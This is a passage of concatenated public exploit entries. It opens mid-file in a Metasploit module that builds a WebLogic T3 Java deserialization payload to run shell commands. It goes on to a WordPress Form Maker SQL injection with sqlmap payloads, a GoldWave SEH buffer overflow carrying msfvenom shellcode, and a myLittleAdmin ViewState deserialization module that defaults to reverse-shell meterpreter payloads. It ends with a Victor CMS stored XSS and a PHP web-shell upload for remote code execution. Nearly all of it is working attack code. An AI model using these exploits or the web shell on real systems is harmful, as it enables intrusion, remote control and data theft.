'7371' # TC_OBJECT, TC_REFERENCE payload_obj << (change_handle? ? '007e0021' : '007e0022') payload_obj << '00000000' payload_obj << '7571' # TC_ARRAY, TC_REFERENCE payload_obj << (change_handle? ? '007e0024' : '007e0025') payload_obj << '00000002' # array size: 2 payload_obj << '7075' # TC_NULL, TC_ARRAY payload_obj << '71' # TC_REFERENCE payload_obj << (change_handle? ? '007e0024' : '007e0025') payload_obj << '00000000' payload_obj << add_tc_null payload_obj << '740006' # TC_STRING, length: 6 payload_obj << '696e766f6b65' # invoke payload_obj << '7371' # TC_OBJECT, TC_REFERENCE payload_obj << (change_handle? ? '007e0021' : '007e0022') payload_obj << '00000000' payload_obj << '7571' # TC_ARRAY, TC_REFERENCE payload_obj << (change_handle? ? '007e0024' : '007e0025') payload_obj << '00000001' payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC payload_obj << '0013' # Class name length: 19 payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String; payload_obj << '672e537472696e673b' payload_obj << 'add256e7e91d7b47' # SerialVersionUID payload_obj << '020000' # Serializable, no fields payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL payload_obj << '00000003' payload_bin = format_payload(payload_data) payload_obj << payload_bin # Original data # --------------------------- # payload_obj << '740007' # String, length: 7 # payload_obj << '2f62696e2f7368' # /bin/sh # payload_obj << '740002' # String, length: 2 # payload_obj << '2d63' # -c # payload_obj << '740017' # String, length: 23 # payload_obj << '746f756368202f746d70' # touch /tmp/blah_ze_blah # payload_obj << '2f626c61685f7a655f62' # payload_obj << '6c6168' # --------------------------- payload_obj << add_tc_null payload_obj << '740004' # String, length: 4 payload_obj << '65786563' # exec payload_obj << '7070' # TC_NULL, TC_NULL payload_obj << '7672' # TC_CLASS, TC_CLASSDESC payload_obj << '0011' # Class name length: 17 payload_obj << '6a6176612e6c616e672e' # java.lang.Runtime payload_obj << '52756e74696d65' payload_obj << '00000000000000000000' payload_obj << '00' payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL end def change_handle? @version_no == Gem::Version.new('12.1.3.0.0') end def limit_filter_uid case @version_no when Gem::Version.new('12.1.3.0.0') '99022596d7b45953' when Gem::Version.new('12.2.1.3.0') 'ab2901b976c4e271' else '954e4590be89865f' end end def chained_extractor_uid case @version_no when Gem::Version.new('12.1.3.0.0') '889f81b0945d5b7f' when Gem::Version.new('12.2.1.3.0') '06ee10433a4cc4b4' else '435b250b72f63db5' end end def abstract_extractor_uid case @version_no when Gem::Version.new('12.1.3.0.0') '658195303e723821' when Gem::Version.new('12.2.1.3.0') '752289ad4d460138' else '9b1be18ed70100e5' end end def reflection_extractor_uid case @version_no when Gem::Version.new('12.1.3.0.0') 'ee7ae995c02fb4a2' when Gem::Version.new('12.2.1.3.0') '87973791b26429dd' else '1f62f564b951b614' end end def reflect_extract_count case @version_no when Gem::Version.new('12.2.1.3.0') '3' else '2' end end def add_sect sect = '' if @version_no == Gem::Version.new('12.2.1.3.0') sect << '4c0011' # Object, length: 17 sect << '6d5f657874726163746f' # m_extractorCached sect << '72436163686564' sect << '71' # TC_REFERENCE sect << '007e0001' # handle end sect end def add_class_desc class_desc = '' class_desc << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC class_desc << '0034' # Class name length: 52 class_desc << '636f6d2e74616e676f73' # com.tangosol.util.filter.AbstractQueryRecorderFilter class_desc << '6f6c2e7574696c2e6669' class_desc << '6c7465722e4162737472' class_desc << '61637451756572795265' class_desc << '636f7264657246696c74' class_desc << '6572' class_desc << 'f3b98201f680eb90' # SerialVersionUID class_desc << '020000' # Serializable, no fields end def add_tc_null return '70' if @version_no == Gem::Version.new('12.2.1.3.0') '' end def t3_send(payload_obj) print_status('Sending object...') request_obj = '000009f3' # Original packet length request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags request_obj << 'ffffffffffffffff' request_obj << '00000071' request_obj << '0000ea60' request_obj << '00000018432ec6' request_obj << 'a2a63985b5af7d63e643' request_obj << '83f42a6d92c9e9af0f94' request_obj << '72027973720078720178' request_obj << '720278700000000c0000' request_obj << '00020000000000000000' request_obj << '00000001007070707070' request_obj << '700000000c0000000200' request_obj << '00000000000000000000' request_obj << '01007006' request_obj << 'fe010000' # separator request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION request_obj << '7372' # TC_OBJECT, TC_CLASSDESC request_obj << '001d' # Class name length: 29 request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry request_obj << '6a766d2e436c61737354' request_obj << '61626c65456e747279' request_obj << '2f52658157f4f9ed' # SerialVersionUID request_obj << '0c0000' # flags? request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC request_obj << '0024' # Class name length: 36 request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo request_obj << '6f6d6d6f6e2e696e7465' request_obj << '726e616c2e5061636b61' request_obj << '6765496e666f' request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID request_obj << '020009' # Serializable, 9 fields request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d616a6f72' # major request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d696e6f72' # minor request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '70617463685570646174' # patchUpdate request_obj << '65' request_obj << '49000c' # Field type: Int, field name length: 12 request_obj << '726f6c6c696e67506174' # rollingPatch request_obj << '6368' request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '73657276696365506163' # servicePack request_obj << '6b' request_obj << '5a000e' # Field type: Z = Bool, field name length: 14 request_obj << '74656d706f7261727950' # temporaryPatch request_obj << '61746368' request_obj << '4c0009' # Field type: Object, field name length: 9 request_obj << '696d706c5469746c65' # implTitle request_obj << '740012' # String, length: 18 request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; request_obj << '2f537472696e673b' request_obj << '4c000a' # Field type: Object, field name length: 10 request_obj << '696d706c56656e646f72' # implVendor request_obj << '71007e0003' # TC_REFERENCE, handle request_obj << '4c000b' # Field type: Object, field name length: 11 request_obj << '696d706c56657273696f6e' # implVersion request_obj << '71007e0003' # TC_REFERENCE, handle request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL request_obj << '7702' # TC_ENDBLOCKDATA request_obj << '000078' request_obj << 'fe010000' # separator request_obj << payload_obj request_obj << 'fe010000' # separator request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION request_obj << '7372' # TC_OBJECT, TC_CLASSDESC request_obj << '001d' # Class name length: 29 request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry request_obj << '6a766d2e436c61737354' request_obj << '61626c65456e747279' request_obj << '2f52658157f4f9ed' # SerialVersionUID request_obj << '0c0000' request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC request_obj << '0021' # Class name length: 33 request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo request_obj << '6f6d6d6f6e2e696e7465' request_obj << '726e616c2e5065657249' request_obj << '6e666f' request_obj << '585474f39bc908f1' # SerialVersionUID request_obj << '020007' # Serializable, 7 fields request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d616a6f72' # major request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d696e6f72' # minor request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '70617463685570646174' # patchUpdate request_obj << '65' request_obj << '49000c' # Field type: Int, field name length: 12 request_obj << '726f6c6c696e67506174' # rollingPatch request_obj << '6368' request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '73657276696365506163' # servicePack request_obj << '6b' request_obj << '5a000e' # Field type: Z = Bool, field name length: 14 request_obj << '74656d706f7261727950' # temporaryPatch request_obj << '61746368' request_obj << '5b0008' # Field type: Array, field name length: 8 request_obj << '7061636b61676573' # packages request_obj << '740027' # String, length: 39 request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo; request_obj << '2f636f6d6d6f6e2f696e' request_obj << '7465726e616c2f506163' request_obj << '6b616765496e666f3b' request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC request_obj << '0024' # Class name length: 36 request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo request_obj << '6f6d6d6f6e2e696e7465' request_obj << '726e616c2e5665727369' request_obj << '6f6e496e666f' request_obj << '972245516452463e' # SerialVersionUID request_obj << '020003' # Serializable, 3 fields request_obj << '5b0008' # Field type: Array, field name length: 8 request_obj << '7061636b61676573' # packages request_obj << '71007e0003' # TC_REFERENCE, handle request_obj << '4c000e' # Field type: Object, field name length: 14 request_obj << '72656c65617365566572' # releaseVersion request_obj << '73696f6e' request_obj << '740012' # String, length: 18 request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String; request_obj << '2f537472696e673b' request_obj << '5b0012' # Field type: Array, field name length: 18 request_obj << '76657273696f6e496e66' # versionInfoAsBytes request_obj << '6f41734279746573' request_obj << '740002' # String, length: 2 request_obj << '5b42' # [B request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC request_obj << '0024' # Class name length: 36 request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo request_obj << '6f6d6d6f6e2e696e7465' request_obj << '726e616c2e5061636b61' request_obj << '6765496e666f' request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID request_obj << '020009' # Serializable, 9 fields request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d616a6f72' # major request_obj << '490005' # Field type: Int, field name length: 5 request_obj << '6d696e6f72' # minor request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '70617463685570646174' # patchUpdate request_obj << '65' request_obj << '49000c' # Field type: Int, field name length: 12 request_obj << '726f6c6c696e67506174' # rollingPatch request_obj << '6368' request_obj << '49000b' # Field type: Int, field name length: 11 request_obj << '73657276696365506163' # servicePack request_obj << '6b' request_obj << '5a000e' # Field type: Z = Bool, field name length: 14 request_obj << '74656d706f7261727950' # temporaryPatch request_obj << '61746368' request_obj << '4c0009' # Field type: Object, field name length: 9 request_obj << '696d706c5469746c65' # implTitle request_obj << '71007e0005' # TC_REFERENCE, handle request_obj << '4c000a' # Field type: Object, field name length: 10 request_obj << '696d706c56656e646f72' # implVendor request_obj << '71007e0005' # TC_REFERENCE, handle request_obj << '4c000b' # Field type: Object, field name length: 11 request_obj << '696d706c56657273696f' # implVersion request_obj << '6e' request_obj << '71007e0005' # TC_REFERENCE, handle request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA request_obj << 'fe00ff' # separator request_obj << 'fe010000' request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION request_obj << '7372' # TC_OBJECT, TC_CLASSDESC request_obj << '0013' # Class name length: 19 request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID request_obj << '6a766d2e4a564d4944' request_obj << 'dc49c23ede121e2a' # SerialVersionUID request_obj << '0c0000' request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA request_obj << '4621' request_obj << '000000000000000000' request_obj << '09' # length: 9 request_obj << '3132372e302e312e31' # 127.0.1.1 request_obj << '000b' # length: 11 request_obj << '75732d6c2d627265656e' # us-l-breens request_obj << '73' request_obj << 'a53caff10000000700' request_obj << '001b59' request_obj << 'ffffffffffffffffffff' request_obj << 'ffffffffffffffffffff' request_obj << 'ffffffff' request_obj << '0078' request_obj << 'fe010000' # separator request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION request_obj << '7372' # TC_OBJECT, TC_CLASSDESC request_obj << '0013' # Class name length: 19 request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID request_obj << '6a766d2e4a564d4944' request_obj << 'dc49c23ede121e2a' # SerialVersionUID request_obj << '0c0000' request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA request_obj << '1d0181401281' request_obj << '34bf427600093132372e' request_obj << '302e312e31a53caff1' request_obj << '000000000078' new_len = (request_obj.length / 2).to_s(16).rjust(8, '0') request_obj[0, 8] = new_len sock.put([request_obj].pack('H*')) sleep(1) end def format_payload(payload_cmd) print_status('Formatting payload...') payload_arr = payload_cmd.split(' ', 3) formatted_payload = '' payload_arr.each do |part| formatted_payload << '74' # denotes a string formatted_payload << part.length.to_s(16).rjust(4, '0') formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join end formatted_payload end def execute_command(cmd, _opts = {}) cmd.prepend('/bin/sh -c ') cmd = build_payload_obj(cmd) t3_send(cmd) end end

# Exploit Title: Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) # Exploit Author: SunCSR (Sun* Cyber Security Research) # Date: 2020 - 5 - 22 # Vender Homepage: https://help.10web.io/ # Version: <= 5.4.1 # Tested on: Ubuntu 18.04 Description: SQL injection in the Form Maker by 10Web WordPress Plugin before 5.4.1 exists via the /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" s parameter. Poc: GET /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" HTTP/1.1 Host: test-wp.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1590140574; PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb Upgrade-Insecure-Requests: 1 SQLMap using: sqlmap -u ' http://test-wp.com:80/wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=123' --cookie='wordpress_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C96d43f4ee5cf009365c9722f461d538f96a62637094759cb6fb7a9f54edac171;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_a1c6f59e10f34b6016913b2f9ff0346f=admin%7C1590313373%7CtioKZPEQ9lGWkoMcKGK2qjTp8kepuU9cqticECRXZ79%7C9a63283d84855ed6eeae8e4b5f3a405fba003ddd15748bf5cdca5caaca228a19;wp-settings-1=libraryContent%3Dbrowse;wp-settings-time-1=1590140574;PHPSESSID=5bpdr8tbj5furvccoadjjj2sgb' Parameter: s (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: page=blocked_ips_fm&s=-1027" OR 8913=8913# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=blocked_ips_fm&s=123" AND (SELECT 2867 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (ELT(2867=2867,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TxQH Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: page=blocked_ips_fm&s=123" AND SLEEP(5)-- oPEC --- [17:20:17] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.29 back-end DBMS: MySQL >= 5.0

# Exploit Title: GoldWave 5.70 – Buffer Overflow (SEH Unicode) # Date: 2020-05-14 # Exploit Author: Andy Bowden # Vendor Homepage: https://www.goldwave.com/ # Version: 5.70 # Download Link: http://goldwave.com//downloads/gwave570.exe # Tested on: Windows 10 x86 # PoC # 1. generate crash.txt, copy contents to clipboard # 2. open gold wave app # 3. select File, Open URL... # 4. paste contents from clipboard after 'http://' # 5. select OK f = open("crash.txt", "wb") buf = b"" buf += b"\x41" * 1019 buf += b"\x71\x71" # Unicode NOP buf += b"\xB3\x48" # 0x004800b3 | pop ecx, pop ebp, ret #realigning stack buf += b"\x75" # Unicode NOP buf += b"\x54" # Push ESP buf += b"\x75" # Unicode NOP buf += b"\x58" # POP EAX buf += b"\x75" # Unicode NOP buf += b"\x05\xFF\x10" # ADD EAX, buf += b"\x75" # Unicode NOP buf += b"\x2d\xEA\x10" # SUB EAX, buf += b"\x75" buf += b"\x71" * 595 #msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX -f python buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51" buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44" buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41" buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50" buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31" buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50" buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49" buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51" buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42" buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b" buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50" buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50" buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42" buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50" buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51" buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c" buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47" buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54" buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51" buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a" buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49" buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b" buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37" buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c" buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58" buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34" buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51" buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35" buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31" buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31" buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d" buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d" buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f" buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45" buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d" buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43" buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47" buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b" buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e" buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41" buf += b"\x44" * (5000 - len(buf)) f.write(buf) f.close()

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> VIEWSTATE_GENERATOR = 'CA0B0334'.freeze # <machineKey # validationKey="5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF" # decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4" # validation="SHA1" /> VIEWSTATE_VALIDATION_KEY = "\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \ "\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \ "\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \ "\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::AutoCheck include Msf::Exploit::ViewState include Msf::Exploit::CmdStager include Msf::Exploit::Powershell def initialize(info = {}) super( update_info( info, 'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization', 'Description' => %q{ This module exploits a ViewState .NET deserialization vulnerability in web-based MS SQL Server management tool myLittleAdmin, for version 3.8 and likely older versions, due to hardcoded <machineKey> parameters in the web.config file for ASP.NET. Popular web hosting control panel Plesk offers myLittleAdmin as an optional component that is selected automatically during "full" installation. This exploit caters to the Plesk target, though it should work fine against a standalone myLittleAdmin setup. Successful exploitation results in code execution as the user running myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as the "SQL Admin MSSQL anonymous account." Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8. }, 'Author' => [ # Reported to SSD (SecuriTeam) by an anonymous researcher # Publicly disclosed by Noam Rathaus of SSD (SecuriTeam) 'Spencer McIntyre', # Inspiration 'wvu' # Module ], 'References' => [ ['CVE', '2020-13166'], ['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'], ['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw'] ], 'DisclosureDate' => '2020-05-15', # SSD (SecuriTeam) advisory 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ [ 'Windows Command', 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } ], [ 'Windows Dropper', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :win_dropper, 'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], 'DefaultOptions' => { 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } ], [ 'PowerShell Stager', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :psh_stager, 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } ] ], 'DefaultTarget' => 2, 'DefaultOptions' => { 'SSL' => true, 'WfsDelay' => 10 # First exploit attempt may be a little slow }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'), OptString.new('TARGETURI', [true, 'Base path', '/']) ]) # XXX: https://github.com/rapid7/metasploit-framework/issues/12963 import_target_defaults end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) ) unless res return CheckCode::Unknown('Target did not respond to check request.') end unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server') return CheckCode::Unknown('Target is not running myLittleAdmin.') end vprint_good("myLittleAdmin is running at #{full_uri}") check_viewstate(res.get_html_document) end def check_viewstate(html) viewstate = html.at('//input[@id = "__VIEWSTATE"]/@value')&.text unless viewstate return CheckCode::Detected("__VIEWSTATE not found, can't complete check.") end @viewstate_generator = html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text unless @viewstate_generator print_warning('__VIEWSTATEGENERATOR not found, using known default value') @viewstate_generator = VIEWSTATE_GENERATOR end # ViewState generator needs to be a packed integer now @viewstate_generator = [@viewstate_generator.to_i(16)].pack('V') we_can_sign_viewstate = can_sign_viewstate?( viewstate, extra: @viewstate_generator, key: VIEWSTATE_VALIDATION_KEY ) if we_can_sign_viewstate return CheckCode::Vulnerable('We can sign our own ViewState.') end CheckCode::Safe("We can't sign our own ViewState.") end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :win_cmd execute_command(payload.encoded) when :win_dropper execute_cmdstager when :psh_stager execute_command(cmd_psh_payload( payload.encoded, payload.arch.first, remove_comspec: true )) end end def execute_command(cmd, _opts = {}) vprint_status("Serializing command: #{cmd}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_post' => { # This is the only parameter we need for successful exploitation! '__VIEWSTATE' => generate_viewstate_payload( cmd, extra: @viewstate_generator, key: VIEWSTATE_VALIDATION_KEY ) } ) unless res && res.code == 302 && res.redirection.path == '/error/index.html' fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}") end print_good("Successfully executed command: #{cmd}") end end

# Exploit Title: Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-05-23 # Exploit Author: Nitya Nand # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Linux # CVE : N/A Description: The POST parameter 'user_name', 'user_firstname', 'user_lastname' is vulnerable to persistent cross site scripting Payload: <script>alert(1)</script> POST /phpmaster/admin/users.php?source=add_user HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/phpmaster/admin/users.php?source=add_user Content-Type: multipart/form-data; boundary=---------------------------515906178311115682892435428 Content-Length: 417375 Connection: close Cookie: PHPSESSID=8810e038f92cd7c711ee8b95db1dcacb Upgrade-Insecure-Requests: 1 -----------------------------515906178311115682892435428 Content-Disposition: form-data; name="user_name" "><script>alert(1)</script> -----------------------------515906178311115682892435428 Content-Disposition: form-data; name="user_firstname" "><script>alert(2)</script> -----------------------------515906178311115682892435428 Content-Disposition: form-data; name="user_lastname" "><script>alert(3)</script> -----------------------------515906178311115682892435428 Content-Disposition: form-data; name="user_image"; filename="9400.jpg" Content-Type: image/jpeg -----------------------------515906178311115682892435428 Content-Disposition: form-data; name="user_role" User -----------------------------515906178311115682892435428 Content-Disposition: form-data; name="user_email" [email protected] -----------------------------515906178311115682892435428 Content-Disposition: form-data; name="user_password" 1234 -----------------------------515906178311115682892435428 Content-Disposition: form-data; name="create_user" Add User -----------------------------515906178311115682892435428--

# Exploit Title: Online Discussion Forum Site 1.0 - Remote Code Execution # Google Dork: N/A # Date: 2020-05-24 # Exploit Author: Selim Enes 'Enesdex' Karaduman # Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html # Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site # Version: 1.0 (REQUIRED) # Tested on: Windows 10 / Wamp Server # CVE : N/A Go to http://localhost/Online%20Discussion%20Forum%20Site/register.php register page to sign up Then fill other fields and upload the shell.php with following PHP-shell-code <?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?> After the registration process is completed go to the following page and execute the os command via uploaded shell http://localhost/Online%20Discussion%20Forum%20Site/ups/shell.php?cmd=$THECODE-YOU-WANT-TO-EXECUTE Any unauthenticated attacker is able to execute arbitrary os command

